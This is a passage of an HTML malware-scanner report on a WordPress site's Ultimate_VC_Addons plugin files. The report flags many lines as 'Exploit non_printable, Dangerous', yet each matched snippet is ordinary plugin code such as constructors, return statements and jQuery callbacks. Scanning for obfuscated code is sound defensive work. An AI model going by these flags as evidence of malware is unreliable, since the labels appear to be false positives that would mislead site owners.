</code></code></td></tr></tbody></table><script type="text/javascript">$("#file_348").DataTable();</script></td></tr><tr><td><p><i class="fas fa-file text-primary mr-2"></i> /var/www/bartolini/bartolini.com.ua/wp-content/plugins/_Ultimate_VC_Addons/params/Ultimate_Navigation.php</p><span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Size: 3.96 kB</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Created: 2022-02-24 03:40:58</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Modified: 2026-01-07 10:03:33</span> <span class="badge badge-pill badge-danger py-2 px-3 mr-1 shadow-none">Dangers: 7</span><br><table id="file_349" class="table container table-sm table-striped table-borderless"><thead ><tr><th>Description</th><th>Match</th></tr></thead><tbody><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$output</span><span style="color: #007700">; } } } if(</span><span style="color: #0000BB">class_exists</span><span style="color: #007700">(</span><span style="color: #DD0000">'Ultimate_Navigation'</span><span style="color: #007700">)) { </span><span style="color: #0000BB">$Ultimate_Navigation </span><span style="color: #007700">= new </span><span style="color: #0000BB">Ultimate_Navigation</span><span style="color: #007700">(); }</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 112</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$output</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 18</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">__construct</span><span style="color: #007700">()</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 21</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">function_exists</span><span style="color: #007700">(</span><span style="color: #DD0000">'vc_add_shortcode_param'</span><span style="color: #007700">))</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 27</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">function_exists</span><span style="color: #007700">(</span><span style="color: #DD0000">'add_shortcode_param'</span><span style="color: #007700">))</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 34</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">icon_settings_field</span><span style="color: #007700">(</span><span style="color: #0000BB">$settings</span><span style="color: #007700">, </span><span style="color: #0000BB">$value</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 73</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function() {</span>
</span>
</code></code></td></tr></tbody></table><script type="text/javascript">$("#file_349").DataTable();</script></td></tr><tr><td><p><i class="fas fa-file text-primary mr-2"></i> /var/www/bartolini/bartolini.com.ua/wp-content/plugins/_Ultimate_VC_Addons/params/Ultimate_DateTime_Picker.php</p><span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Size: 1.59 kB</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Created: 2022-02-24 03:40:58</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Modified: 2026-01-07 10:03:33</span> <span class="badge badge-pill badge-danger py-2 px-3 mr-1 shadow-none">Dangers: 6</span><br><table id="file_350" class="table container table-sm table-striped table-borderless"><thead ><tr><th>Description</th><th>Match</th></tr></thead><tbody><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$output</span><span style="color: #007700">; } } } if(</span><span style="color: #0000BB">class_exists</span><span style="color: #007700">(</span><span style="color: #DD0000">'Ultimate_DateTime_Picker_Param'</span><span style="color: #007700">)) { </span><span style="color: #0000BB">$Ultimate_DateTime_Picker_Param </span><span style="color: #007700">= new </span><span style="color: #0000BB">Ultimate_DateTime_Picker_Param</span><span style="color: #007700">(); }</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 15</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">function_exists</span><span style="color: #007700">(</span><span style="color: #DD0000">'add_shortcode_param'</span><span style="color: #007700">))</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 22</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">datetimepicker</span><span style="color: #007700">(</span><span style="color: #0000BB">$settings</span><span style="color: #007700">, </span><span style="color: #0000BB">$value</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 33</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$output</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 6</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">__construct</span><span style="color: #007700">()</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 9</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">function_exists</span><span style="color: #007700">(</span><span style="color: #DD0000">'vc_add_shortcode_param'</span><span style="color: #007700">))</span>
</span>
</code></code></td></tr></tbody></table><script type="text/javascript">$("#file_350").DataTable();</script></td></tr><tr><td><p><i class="fas fa-file text-primary mr-2"></i> /var/www/bartolini/bartolini.com.ua/wp-content/plugins/_Ultimate_VC_Addons/params/Ultimate_Animator.php</p><span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Size: 2.86 kB</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Created: 2022-02-24 03:40:58</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Modified: 2026-01-07 10:03:33</span> <span class="badge badge-pill badge-danger py-2 px-3 mr-1 shadow-none">Dangers: 8</span><br><table id="file_351" class="table container table-sm table-striped table-borderless"><thead ><tr><th>Description</th><th>Match</th></tr></thead><tbody><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function(){</span><span style="color: #0000BB">jQuery</span><span style="color: #007700">(</span><span style="color: #0000BB">this</span><span style="color: #007700">).</span><span style="color: #0000BB">removeClass</span><span style="color: #007700">(); }); }); }); </</span><span style="color: #0000BB">script</span><span style="color: #007700">></span><span style="color: #DD0000">'; return $output; } } } if(class_exists('</span><span style="color: #0000BB">Ultimate_Animator_Param</span><span style="color: #DD0000">')) { $Ultimate_Animator_Param = new Ultimate_Animator_Param(); }</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 15</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">function_exists</span><span style="color: #007700">(</span><span style="color: #DD0000">'add_shortcode_param'</span><span style="color: #007700">))</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 22</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">animator_param</span><span style="color: #007700">(</span><span style="color: #0000BB">$settings</span><span style="color: #007700">, </span><span style="color: #0000BB">$value</span><span style="color: #007700">){</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 57</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function(){</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 62</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function(){</span><span style="color: #0000BB">jQuery</span><span style="color: #007700">(</span><span style="color: #0000BB">this</span><span style="color: #007700">).</span><span style="color: #0000BB">removeClass</span><span style="color: #007700">();</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 67</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$output</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 6</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">__construct</span><span style="color: #007700">()</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 9</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">function_exists</span><span style="color: #007700">(</span><span style="color: #DD0000">'vc_add_shortcode_param'</span><span style="color: #007700">))</span>
</span>
</code></code></td></tr></tbody></table><script type="text/javascript">$("#file_351").DataTable();</script></td></tr><tr><td><p><i class="fas fa-file text-primary mr-2"></i> /var/www/bartolini/bartolini.com.ua/wp-content/plugins/_Ultimate_VC_Addons/params/Ultimate_BoxShadow.php</p><span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Size: 7.30 kB</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Created: 2022-02-24 03:40:58</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Modified: 2026-01-07 10:03:33</span> <span class="badge badge-pill badge-danger py-2 px-3 mr-1 shadow-none">Dangers: 9</span><br><table id="file_352" class="table container table-sm table-striped table-borderless"><thead ><tr><th>Description</th><th>Match</th></tr></thead><tbody><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$html</span><span style="color: #007700">; } function </span><span style="color: #0000BB">get_units</span><span style="color: #007700">(</span><span style="color: #0000BB">$unit</span><span style="color: #007700">) { </span><span style="color: #0000BB">$html </span><span style="color: #007700">= </span><span style="color: #DD0000">'<div class="ultbs-unit">'</span><span style="color: #007700">; </span><span style="color: #0000BB">$html </span><span style="color: #007700">.= </span><span style="color: #DD0000">' <label>'</span><span style="color: #007700">.</span><span style="color: #0000BB">esc_html</span><span style="color: #007700">( </span><span style="color: #0000BB">$unit </span><span style="color: #007700">).</span><span style="color: #DD0000">'</label>'</span><span style="color: #007700">; </span><span style="color: #0000BB">$html </span><span style="color: #007700">.= </span><span style="color: #DD0000">'</div>'</span><span style="color: #007700">; return </span><span style="color: #0000BB">$html</span><span style="color: #007700">; } function </span><span style="color: #0000BB">ultimate_boxshadow_param_scripts</span><span style="color: #007700">(</span><span style="color: #0000BB">$hook</span><span style="color: #007700">) { if(</span><span style="color: #0000BB">$hook </span><span style="color: #007700">== </span><span style="color: #DD0000">"post.php" </span><span style="color: #007700">|| </span><span style="color: #0000BB">$hook </span><span style="color: #007700">== </span><span style="color: #DD0000">"post-new.php"</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 119</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$html</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 121</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">ultimate_boxshadow_param_item</span><span style="color: #007700">(</span><span style="color: #0000BB">$dashicon</span><span style="color: #007700">, </span><span style="color: #FF8000">/*$mode,*/ </span><span style="color: #0000BB">$unit</span><span style="color: #007700">,</span><span style="color: #FF8000">/* $default_value,*/</span><span style="color: #0000BB">$default_value</span><span style="color: #007700">, </span><span style="color: #0000BB">$key</span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 131</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">get_units</span><span style="color: #007700">(</span><span style="color: #0000BB">$unit</span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 139</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">ultimate_boxshadow_param_scripts</span><span style="color: #007700">(</span><span style="color: #0000BB">$hook</span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 30</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">__construct</span><span style="color: #007700">()</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 33</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">function_exists</span><span style="color: #007700">(</span><span style="color: #DD0000">'vc_add_shortcode_param'</span><span style="color: #007700">))</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 39</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">function_exists</span><span style="color: #007700">(</span><span style="color: #DD0000">'add_shortcode_param'</span><span style="color: #007700">)) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 47</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">ultimate_boxshadow_callback</span><span style="color: #007700">(</span><span style="color: #0000BB">$settings</span><span style="color: #007700">, </span><span style="color: #0000BB">$value</span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr></tbody></table><script type="text/javascript">$("#file_352").DataTable();</script></td></tr><tr><td><p><i class="fas fa-file text-primary mr-2"></i> /var/www/bartolini/bartolini.com.ua/wp-content/plugins/_Ultimate_VC_Addons/params/Ultimate_Gradient.php</p><span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Size: 8.58 kB</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Created: 2022-02-24 03:40:58</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Modified: 2026-01-07 10:03:33</span> <span class="badge badge-pill badge-danger py-2 px-3 mr-1 shadow-none">Dangers: 16</span><br><table id="file_353" class="table container table-sm table-striped table-borderless"><thead ><tr><th>Description</th><th>Match</th></tr></thead><tbody><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$output</span><span style="color: #007700">; } } } if(</span><span style="color: #0000BB">class_exists</span><span style="color: #007700">(</span><span style="color: #DD0000">'Ultimate_Gradient_Param'</span><span style="color: #007700">)) { </span><span style="color: #0000BB">$Ultimate_Gradient_Param </span><span style="color: #007700">= new </span><span style="color: #0000BB">Ultimate_Gradient_Param</span><span style="color: #007700">(); }</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 157</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function(</span><span style="color: #0000BB">i</span><span style="color: #007700">,</span><span style="color: #0000BB">opt</span><span style="color: #007700">){</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 15</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">function_exists</span><span style="color: #007700">(</span><span style="color: #DD0000">'add_shortcode_param'</span><span style="color: #007700">))</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 179</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function(</span><span style="color: #0000BB">stringGradient</span><span style="color: #007700">,</span><span style="color: #0000BB">cssGradient</span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 195</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function(</span><span style="color: #0000BB">cssGradient</span><span style="color: #007700">){</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 223</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">uvc_gradient_verfiy_depedant</span><span style="color: #007700">(</span><span style="color: #0000BB">dependency_element</span><span style="color: #007700">, </span><span style="color: #0000BB">dependency_values_array</span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 226</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">true</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 228</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">false</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 22</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">gradient_picker</span><span style="color: #007700">(</span><span style="color: #0000BB">$settings</span><span style="color: #007700">, </span><span style="color: #0000BB">$value</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 234</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$output</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 52</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function(){</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 55</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function(</span><span style="color: #0000BB">el</span><span style="color: #007700">) { return </span><span style="color: #0000BB">el</span><span style="color: #007700">; });</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 6</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">__construct</span><span style="color: #007700">()</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 88</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function() {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 99</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">gradient_pre_defined</span><span style="color: #007700">(</span><span style="color: #0000BB">dependency_element</span><span style="color: #007700">, </span><span style="color: #0000BB">dependency_values_array</span><span style="color: #007700">){</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 9</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">function_exists</span><span style="color: #007700">(</span><span style="color: #DD0000">'vc_add_shortcode_param'</span><span style="color: #007700">))</span>
</span>
</code></code></td></tr></tbody></table><script type="text/javascript">$("#file_353").DataTable();</script></td></tr><tr><td><p><i class="fas fa-file text-primary mr-2"></i> /var/www/bartolini/bartolini.com.ua/wp-content/plugins/_Ultimate_VC_Addons/params/Ultimate_Image_Single.php</p><span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Size: 3.83 kB</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Created: 2022-02-24 03:40:58</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Modified: 2026-01-07 10:03:33</span> <span class="badge badge-pill badge-danger py-2 px-3 mr-1 shadow-none">Dangers: 9</span><br><table id="file_354" class="table container table-sm table-striped table-borderless"><thead ><tr><th>Description</th><th>Match</th></tr></thead><tbody><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
